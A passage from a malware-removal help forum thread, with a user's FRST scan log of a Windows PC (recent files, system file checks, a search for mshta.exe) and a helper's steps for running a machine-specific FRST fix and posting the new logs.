2014-05-15 15:04 - 2014-03-04 17:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-05-15 15:04 - 2014-03-04 17:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:20 - 03969984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-05-15 15:04 - 2014-03-04 17:20 - 03914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:17 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:16 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-07 09:22 - 2014-06-04 12:13 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-07 09:22 - 2014-05-17 03:31 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:50 - 2014-05-05 16:52 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in

==================== One Month Modified Files and Folders =======

2014-06-04 13:10 - 2014-06-04 13:09 - 00024726 _____ () C:\Users\Hewlett Packard\Desktop\FRST.txt
2014-06-04 13:10 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Temp
2014-06-04 13:09 - 2014-06-04 13:09 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\FRST-OlderVersion
2014-06-04 13:09 - 2014-05-25 06:56 - 00000000 ____D () C:\FRST
2014-06-04 13:09 - 2014-05-25 06:48 - 02068992 _____ (Farbar) C:\Users\Hewlett Packard\Desktop\FRST64.exe
2014-06-04 13:06 - 2014-05-27 15:38 - 00233493 _____ () C:\Windows\WindowsUpdate.log
2014-06-04 12:41 - 2013-11-25 12:31 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-06-04 12:29 - 2013-05-31 13:28 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-06-04 12:13 - 2014-05-07 09:22 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-06-04 12:13 - 2013-06-04 13:38 - 00000000 ___RD () C:\Users\Hewlett Packard\Dropbox
2014-06-04 12:13 - 2013-06-04 13:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Dropbox
2014-06-04 12:10 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-06-04 12:10 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-06-04 12:07 - 2009-07-14 13:13 - 00783400 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-06-04 12:03 - 2013-11-25 12:31 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-06-04 12:02 - 2014-06-04 11:41 - 00000112 _____ () C:\Windows\setupact.log
2014-06-04 12:02 - 2009-07-14 13:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-06-04 12:00 - 2014-05-28 14:10 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\NCWC
2014-06-04 12:00 - 2013-10-31 21:39 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Outlook Files
2014-06-04 11:59 - 2014-06-04 11:59 - 00086552 _____ () C:\Users\Hewlett Packard\AppData\Local\GDIPFONTCACHEV1.DAT
2014-06-04 11:51 - 2014-06-04 11:50 - 04176736 _____ (Kaspersky Lab ZAO) C:\Users\Hewlett Packard\Desktop\tdsskiller.exe
2014-06-04 11:44 - 2013-05-13 14:14 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Skype
2014-06-04 11:41 - 2014-06-04 11:41 - 00343376 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-06-04 11:41 - 2014-06-04 11:41 - 00000000 _____ () C:\Windows\setuperr.log
2014-06-04 10:09 - 2014-01-15 00:02 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Deployment
2014-06-04 09:36 - 2013-12-30 05:17 - 00000000 ___RD () C:\Users\Hewlett Packard\Desktop\Technical 2014
2014-06-04 09:11 - 2014-06-02 08:35 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-06-04 09:03 - 2013-08-14 18:28 - 00000372 _____ () C:\Windows\Tasks\HPCeeScheduleForHewlett Packard.job
2014-06-04 09:02 - 2014-05-25 06:57 - 00000000 ____D () C:\AdwCleaner
2014-06-04 08:52 - 2013-08-14 18:28 - 00003246 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForHewlett Packard
2014-06-04 08:51 - 2013-06-05 07:48 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt
2014-06-04 08:51 - 2013-05-08 11:19 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2014-06-03 23:05 - 2013-09-23 13:55 - 00000000 ____D () C:\Program Files\CCleaner
2014-06-03 22:28 - 2014-06-03 22:27 - 00001480 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_222723.reg
2014-06-03 16:09 - 2014-06-03 16:07 - 00000507 _____ () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Navigation Canceled.website
2014-06-03 15:55 - 2014-06-03 15:54 - 00001920 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_155455.reg
2014-06-03 12:23 - 2014-06-03 12:23 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (4).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (3).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (2).exe
2014-06-03 12:22 - 2014-06-03 12:22 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu (1).exe
2014-06-03 10:07 - 2014-06-03 10:07 - 02347384 _____ (ESET) C:\Users\Hewlett Packard\Downloads\esetsmartinstaller_enu.exe
2014-06-03 09:01 - 2014-06-03 09:01 - 00002332 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_090128.reg
2014-06-03 09:00 - 2014-06-03 09:00 - 00018346 _____ () C:\Users\Hewlett Packard\Documents\cc_20140603_090029.reg
2014-06-03 01:19 - 2014-06-03 00:04 - 00000000 ____D () C:\ProgramData\Yahoo!
2014-06-02 23:58 - 2014-06-02 23:57 - 00691576 _____ (Yahoo! Inc.) C:\Users\Hewlett Packard\Downloads\msgr11us.exe
2014-06-02 23:40 - 2014-05-25 18:58 - 00001969 _____ () C:\Users\Public\Desktop\Samsung Kies 3.lnk
2014-06-02 23:33 - 2013-11-27 11:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Samsung
2014-06-02 23:33 - 2013-11-27 11:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2014-06-02 23:33 - 2013-11-27 11:32 - 00000000 ____D () C:\ProgramData\Samsung
2014-06-02 23:33 - 2013-11-27 11:32 - 00000000 ____D () C:\Program Files (x86)\Samsung
2014-06-02 23:33 - 2011-11-10 08:10 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-06-02 23:25 - 2014-06-02 23:24 - 00022858 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_232432.reg
2014-06-02 23:23 - 2014-06-02 23:23 - 00079904 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_232256.reg
2014-06-02 22:14 - 2014-06-02 22:03 - 00001521 _____ () C:\zoek-results.log
2014-06-02 22:14 - 2014-06-02 22:02 - 00002957 _____ () C:\runcheck.txt
2014-06-02 22:14 - 2014-06-02 21:58 - 00000000 ____D () C:\zoek_backup
2014-06-02 22:13 - 2014-06-02 22:13 - 00000021 _____ () C:\folders.log
2014-06-02 22:13 - 2014-06-02 22:13 - 00000000 ____D () C:\zoek
2014-06-02 21:55 - 2014-06-02 21:31 - 01285120 _____ () C:\Users\Hewlett Packard\Desktop\zoek.exe
2014-06-02 21:27 - 2014-06-02 21:26 - 00019570 _____ () C:\Users\Hewlett Packard\Documents\cc_20140602_212646.reg
2014-06-02 11:17 - 2014-02-03 14:30 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Dusit Signage Package
2014-06-02 10:49 - 2009-07-14 10:38 - 00000000 ____D () C:\Users\Ralph Walker\Desktop\C
2014-06-02 08:35 - 2014-06-02 08:35 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-06-02 08:35 - 2014-06-02 08:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-06-02 08:33 - 2014-06-02 08:31 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Hewlett Packard\Downloads\mbam-setup-2.0.2.1012.exe
2014-06-02 08:24 - 2014-06-02 08:21 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\AdwCleaner.exe
2014-06-02 08:14 - 2014-06-02 08:14 - 01327971 _____ () C:\Users\Hewlett Packard\Desktop\AdwCleaner.exe
2014-06-01 18:05 - 2014-02-05 15:24 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\RHI Makati Office
2014-06-01 17:54 - 2013-12-30 05:19 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Equinet 2014
2014-06-01 17:11 - 2014-06-01 17:11 - 00053780 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-06-01 16:50 - 2014-05-27 17:06 - 00000000 ____D () C:\Users\Hewlett Packard\Downloads\FRST-OlderVersion
2014-05-31 21:06 - 2013-12-03 10:18 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\CrashDumps
2014-05-28 11:38 - 2013-06-04 13:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-05-28 11:38 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-05-27 19:03 - 2014-05-27 19:00 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Google
2014-05-27 19:00 - 2013-11-25 12:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Google
2014-05-27 18:24 - 2014-05-27 18:24 - 00380416 _____ () C:\Users\Hewlett Packard\Downloads\9kx0sxi1.exe
2014-05-27 18:13 - 2014-05-27 18:13 - 00030075 _____ () C:\Users\Hewlett Packard\Downloads\dds.txt
2014-05-27 18:13 - 2014-05-27 18:13 - 00008131 _____ () C:\Users\Hewlett Packard\Downloads\attach.txt
2014-05-27 18:05 - 2014-05-27 18:05 - 00016141 _____ () C:\Users\Hewlett Packard\Downloads\hijackthis.log
2014-05-27 18:02 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\VirtualStore
2014-05-27 17:59 - 2014-05-27 17:58 - 00688992 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\dds.scr
2014-05-27 17:56 - 2014-05-27 17:56 - 00388608 _____ (Trend Micro Inc.) C:\Users\Hewlett Packard\Downloads\HijackThis.exe
2014-05-27 17:14 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-05-27 17:09 - 2014-05-27 17:09 - 00062571 _____ () C:\Users\Hewlett Packard\Downloads\Shortcut.txt
2014-05-27 17:09 - 2014-05-25 07:01 - 00031358 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Ralph Walker\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Public\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\hedev\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\dub_cm_auto\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 13:05 - 00000000 ____D () C:\Users\Default User\AppData\Local\temp
2014-05-27 13:05 - 2014-05-27 12:35 - 00000000 ____D () C:\Qoobox
2014-05-27 13:05 - 2014-04-23 09:28 - 00000000 ____D () C:\Users\dub_cm_auto
2014-05-27 13:05 - 2013-12-16 21:26 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Apps\2.0
2014-05-27 13:05 - 2012-03-03 10:14 - 00000000 ____D () C:\Users\Ralph Walker
2014-05-27 13:04 - 2014-05-27 13:04 - 00033698 _____ () C:\ComboFix.txt
2014-05-27 12:59 - 2014-05-27 12:35 - 00000000 ____D () C:\Windows\erdnt
2014-05-27 12:47 - 2009-07-14 10:34 - 00000215 _____ () C:\Windows\system.ini
2014-05-27 12:28 - 2014-05-27 12:28 - 05200919 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\username123.exe
2014-05-27 12:22 - 2014-05-27 12:22 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\adwcleaner_3.211.exe
2014-05-27 09:49 - 2014-05-27 09:49 - 00007606 _____ () C:\Users\Hewlett Packard\AppData\Local\Resmon.ResmonCfg
2014-05-27 09:31 - 2014-05-25 05:44 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-27 09:29 - 2014-05-25 05:46 - 00000000 ____D () C:\NPE
2014-05-27 03:19 - 2013-06-04 13:41 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Adobe
2014-05-27 00:17 - 2013-05-31 13:28 - 00692400 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-05-27 00:17 - 2013-05-31 13:28 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-05-27 00:17 - 2011-11-10 07:56 - 00070832 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233429.reg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233404.reg
2014-05-26 23:33 - 2014-05-26 23:33 - 00012436 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233313.reg
2014-05-26 23:32 - 2014-05-26 23:31 - 00046014 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233124.reg
2014-05-26 10:07 - 2014-05-25 04:13 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-26 01:24 - 2013-12-02 03:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\vlc
2014-05-25 20:13 - 2014-05-25 20:12 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\SkyCable
2014-05-25 19:15 - 2013-11-27 11:40 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\samsung
2014-05-25 18:58 - 2014-05-25 18:58 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\SelfMV
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Downloads\Rkill.txt
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:11 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard
2014-05-25 05:45 - 2012-04-06 01:53 - 00000000 ____D () C:\ProgramData\Norton
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 03:27 - 2013-12-02 03:31 - 00000258 __RSH () C:\Users\Hewlett Packard\ntuser.pol
2014-05-23 19:22 - 2014-05-23 18:58 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 19:09 - 2014-05-23 18:57 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-23 12:48 - 2013-11-25 12:33 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-05-21 09:06 - 2013-05-07 15:45 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Youcam
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-20 00:56 - 2013-12-30 05:17 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Personal 2014
2014-05-17 07:15 - 2013-05-07 15:41 - 00000000 ___RD () C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
2014-05-17 03:31 - 2014-05-07 09:22 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-17 03:15 - 2013-05-13 14:23 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-05-17 03:07 - 2013-08-14 18:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-05-17 03:03 - 2013-05-08 11:23 - 93223848 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-16 23:18 - 2014-01-17 11:42 - 00002019 _____ () C:\Users\Public\Desktop\Adobe Reader X.lnk
2014-05-16 23:18 - 2011-11-10 08:07 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-05-16 23:15 - 2013-11-25 12:17 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Internet Security
2014-05-16 23:15 - 2013-05-07 15:41 - 00002501 _____ () C:\Users\Public\Desktop\Norton Internet Security.lnk
2014-05-16 23:15 - 2012-04-06 01:53 - 00003234 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-05-16 23:15 - 2012-04-06 01:53 - 00000000 ____D () C:\Windows\system32\Drivers\NISx64
2014-05-12 07:26 - 2014-06-02 08:35 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-05-12 07:26 - 2014-06-02 08:35 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-05-12 07:25 - 2014-06-02 08:35 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-05-11 11:36 - 2013-11-25 12:31 - 00003912 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-05-11 11:36 - 2013-11-25 12:31 - 00003660 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-09 15:35 - 2013-10-22 10:14 - 00000000 ____D () C:\ProgramData\Oracle
2014-05-09 15:35 - 2013-09-05 18:21 - 00000000 ____D () C:\Program Files (x86)\Java
2014-05-09 14:14 - 2014-05-15 15:04 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-09 14:11 - 2014-05-15 15:04 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-07 22:56 - 2013-10-09 17:56 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Aeden
2014-05-06 12:40 - 2014-05-17 03:14 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-06 12:17 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-06 11:25 - 2014-05-17 03:14 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-06 11:07 - 2014-05-17 03:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-06 11:00 - 2014-05-17 03:14 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-06 10:10 - 2014-05-17 03:14 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:52 - 2014-05-05 16:50 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in

Some content of TEMP:
====================
C:\Users\Hewlett Packard\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmphkiown.dll
C:\Users\Hewlett Packard\AppData\Local\Temp\{2C7E5FEA-06B3-48D4-A7D7-9EB40D3CB649}.exe

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2014-05-29 00:26

==================== End Of Log ============================


----------



## raphael100 (May 24, 2014)

Farbar Recovery Scan Tool (x64) Version: 02-06-2014
Ran by Hewlett Packard at 2014-06-04 13:16:43
Running from C:\Users\Hewlett Packard\Desktop
Boot Mode: Normal

================== Search Files: "mshta.exe" =============

C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_9.4.8112.16421_none_d84cd7d510621386\mshta.exe
[2011-11-10 07:54] - [2011-11-10 07:54] - 0011776 ____A (Microsoft Corporation) 061CBB1058A10C0875D18CAFF835AE97

C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_8.0.7600.16385_none_da5dd271ce714fff\mshta.exe
[2009-07-14 07:42] - [2009-07-14 09:14] - 0047104 ____A (Microsoft Corporation) E2FE656A79D8F4C4FD70201E7423BDA0

C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_11.2.9600.16428_none_4605aca152cc8281\mshta.exe
[2013-11-25 12:29] - [2013-11-25 12:29] - 0013312 ____A (Microsoft Corporation) ABDFC692D9FE43E2BA8FE6CB5A8CB95A

C:\Windows\winsxs\wow64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_10.2.9200.16521_none_e1883327ae31ee9e\mshta.exe
[2013-05-08 11:52] - [2013-05-08 11:52] - 0012800 ____A (Microsoft Corporation) 3AB2A38F7EA9E62D176A78FB58761E24

C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_9.4.8112.16421_none_cdf82d82dc01518b\mshta.exe
[2011-11-10 07:54] - [2011-11-10 07:54] - 0012288 ____A (Microsoft Corporation) E49EC15EFFC9F01298093DBD7E0A31AF

C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_8.0.7600.16385_none_d009281f9a108e04\mshta.exe
[2009-07-14 07:58] - [2009-07-14 09:39] - 0043520 ____A (Microsoft Corporation) 45B5032CD23466294C0A381BFC6E8C65

C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_11.2.9600.16428_none_3bb1024f1e6bc086\mshta.exe
[2013-11-25 12:29] - [2013-11-25 12:29] - 0013824 ____A (Microsoft Corporation) 95828D670CFD3B16EE188168E083C3C5

C:\Windows\winsxs\amd64_microsoft-windows-ie-htmlapplication_31bf3856ad364e35_10.2.9200.16521_none_d73388d579d12ca3\mshta.exe
[2013-05-08 11:52] - [2013-05-08 11:52] - 0013824 ____A (Microsoft Corporation) 658E8FEC79A4AB5BFDE032627B5C9667

C:\Windows\SysWOW64\mshta.exe
[2013-11-25 12:29] - [2013-11-25 12:29] - 0013312 ____A (Microsoft Corporation) ABDFC692D9FE43E2BA8FE6CB5A8CB95A

C:\Windows\System32\mshta.exe
[2013-11-25 12:29] - [2013-11-25 12:29] - 0013824 ____A (Microsoft Corporation) 95828D670CFD3B16EE188168E083C3C5

====== End Of Search ======


----------



## emeraldnzl (Nov 3, 2007)

> TDSS did not find anything - so I just copied the log.


Thank you and no, I didn't think it would find anything but just as well to check.

There are some things showing in the FRST log and I will give you another fix after I have properly analyzed the log, might take a bit of time though. 

I will check out the mshta.exe ones we searched too although at a quick glance they all look like the legitimate ones.


----------



## emeraldnzl (Nov 3, 2007)

Download the attached *fixlist.txt* file and save it to the Desktop.

*NOTE.* It's important that both files, *FRST* and *fixlist.txt *are in the same location or the fix will not work.

*NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system*

Run *FRST/FRST64* and press the *Fix* button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

*After that*

Please run another FRST scan with the Addition.txt box ticked and post back the two logs generated - FRST.txt and Addition.txt.

*So when you return please post
Fixlog.txt
FRST.txt
Addition.txt
*


----------



